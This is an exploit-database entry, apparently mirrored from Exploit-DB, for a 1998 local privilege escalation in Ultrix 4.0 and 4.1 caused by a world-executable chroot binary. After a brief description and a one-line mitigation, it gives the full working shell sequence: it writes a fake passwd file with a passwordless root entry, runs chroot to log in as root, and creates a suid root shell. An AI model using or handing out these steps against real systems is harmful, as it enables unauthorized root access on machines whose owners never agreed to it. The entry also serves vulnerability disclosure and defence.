header-logo
Suggest Exploit
vendor:
Ultrix
by:
SecurityFocus
8.3
CVSS
HIGH
Improperly Installed chroot in Ultrix
N/A
CWE
Product Name: Ultrix
Affected Version From: Ultrix 4.0
Affected Version To: Ultrix 4.1
Patch Exists: No
Related CWE: N/A
CPE: o:dec:ultrix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
1998

Improperly Installed chroot in Ultrix

In Ultrix versions 4.0 and 4.1, the /usr/bin/chroot binary is installed with improper permissions, allowing any user to execute it. This can lead to system users gaining unauthorized privileges. An attacker can create a fake root environment in /tmp/etc and /tmp/bin, copy the /bin/sh and /bin/chmod binaries to the fake environment, and then execute the chroot binary to gain root access. The attacker can then use the chmod binary to set the suid bit on the /tmp/bin/sh binary, allowing them to gain root access.

Mitigation:

Ensure that the /usr/bin/chroot binary is installed with the correct permissions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.

Navigation

Suggest Exploit

Services By CQR